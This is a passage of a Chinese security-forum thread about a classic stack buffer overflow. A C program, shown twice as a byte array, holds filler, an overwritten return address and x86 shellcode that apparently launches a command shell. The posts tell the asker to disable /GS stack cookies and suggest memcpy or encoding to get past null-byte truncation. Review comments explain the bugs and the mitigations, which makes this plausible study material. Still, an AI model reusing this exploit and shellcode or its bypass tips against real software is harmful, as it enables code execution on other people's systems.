4 楼
#include <stdio.h> #include <string.h>
/*
 * Byte table that overrun() below copies into an 8-byte stack buffer.
 * Layout, exactly as written:
 *   - 12 x 0x41 ('A'): filler, already longer than the 8-byte target
 *   - 0x12,0x45,0xfa,0x7f: one address-sized value right after the filler;
 *     presumably meant to land on overrun()'s saved return address — that is
 *     inferred from the buffer size, not stated on the page, and the actual
 *     frame layout depends on compiler, options and target (confirm under a
 *     debugger)
 *   - remaining bytes: x86 machine code (what the thread calls the
 *     shellcode); deliberately not decoded here
 * NOTE(review): the initializer ends with 0x5D, so the array has no NUL
 * terminator of its own, but it does contain 0x00 bytes partway through
 * (0xEC,0x10,0x00,...).  strcpy() stops at the first of them, so only the
 * prefix before it is ever copied — this is the "00 truncation" the reply
 * in post 7 points out.  Raw bytes belong in `unsigned char`: with a plain
 * (possibly signed) `char`, values above 0x7F are converted in an
 * implementation-defined way.
 * Defender's view: this is the textbook stack smash that MSVC /GS stack
 * cookies (the "cookie安全检查" the thread says to disable), DEP/NX and ASLR
 * exist to stop.
 */
char name[] = { 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,
    0x12,0x45,0xfa,0x7f,
    0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56,
    0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44,
    0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81,
    0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7,
    0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,
    0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93,
    0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D };
/*
 * Deliberately vulnerable: copies the global `name` into an 8-byte stack
 * buffer with strcpy(), which stops only at the first 0x00 byte of `name`,
 * far past output[7].  Everything beyond the buffer is an out-of-bounds
 * write into the rest of the frame — undefined behaviour; what exactly is
 * overwritten depends on compiler, options and target.
 * Mitigations that would catch this: a copy bounded by sizeof output,
 * MSVC /GS stack cookies (the thread says to turn them off for the demo),
 * DEP/NX and ASLR.
 */
void overrun( )
{
    char output[8];
    strcpy(output, name);
}

/*
 * Driver: calls overrun(), then tries to dump an 8-byte buffer.
 * NOTE(review): the dump loop is wrong independently of the overflow:
 *   - `output` here is a fresh, uninitialised local of main(), not the
 *     buffer overrun() wrote to; reading it is undefined behaviour.
 *   - `printf("\\0x%x", output)` passes the array (decayed to char *) to
 *     %x instead of output[i]; the format/argument mismatch is undefined
 *     behaviour and on a 32-bit build typically prints an address, not a
 *     byte.  The evident intent is `(unsigned char)output[i]`.
 *   - `i<8&&output`: an array decays to a non-null pointer, so `&&output`
 *     is always true and guards nothing.
 * The commented-out strcpy() is dead code left from an earlier version.
 */
int main()
{
    /*strcpy(output, name);*/
    overrun();
    char output[8];
    for (int i = 0; i < 8 && output; i++)
        printf("\\0x%x", output);
    return 0;
}
我这里调试下发现是可以进入shellcode 的
没明白你的 cmd 窗口是指什么？多出来一个么？这个不能只有自带的那个。
你现在写的是需要main()函数退出时才执行shellcode
ps:需要 release编译 工程配置里去掉cookie安全检查
|
能力值:
( LV5,RANK:60 )
|
-
-
7 楼
0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D
楼主你用的是字符串处理函数进行溢出，遇到 00 就被截断了。
用memcpy 试一下估计就好用了
或者你自己把00替换,然后再写解码shellcode
不过我将你name中实际需要运行的部分声明成 void fn() 来执行都会crash